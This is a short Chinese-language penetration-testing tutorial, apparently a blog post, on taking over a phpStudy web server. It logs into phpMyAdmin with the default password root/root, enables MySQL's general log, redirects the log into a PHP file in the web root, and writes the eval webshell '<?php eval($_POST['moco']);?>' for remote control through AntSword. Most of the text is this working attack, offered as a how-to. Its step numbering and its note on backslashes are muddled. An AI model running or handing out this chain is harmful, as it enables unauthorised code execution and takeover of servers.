当初接触渗透测试的时候getshell就会个文件上传,后来随着工作学到的知识越来越多,慢慢的getshell的姿势也慢慢的学到了些,这次给大家分享一个很常见也很基础的getshell的方式。如有什么不严谨的地方,还望大佬指点。
1.准备环境
一台装有Phpstudy(mysql>5.0)的服务器
中国蚁剑
2.开启phpstudy
3.访问服务器phpmyadmin页面
4.弱口令root root登录进去,点击SQL,执行sql语句
查看数据库存放路径,然后根据数据库存放路径猜测网站的绝对路径
select @@datadir;
这时我们可以看到数据库的路径为“C:\phpStudy\MySQL\data\”,由此我们可以推断网站的绝对路径为“C:\phpStudy\WWW\”
6.查看日志是否开启
show variables like ‘%general%’;
此刻我们可以看到日志是关闭状态的,路径为C:\phpStudy\WWW\general_log_file。
7.手动开启日志
SET GLOBAL general_log=‘on’;
8.修改日志路径
set global general_log_file=‘C:\phpStudy\WWW\moco.php’;
注意:这里一定要用\,或者使用/,不能使用\。
9.写入shell
select “<?php eval($_POST['moco']);?>”;
6.这时我们就可以通过蚁剑连接getshell了
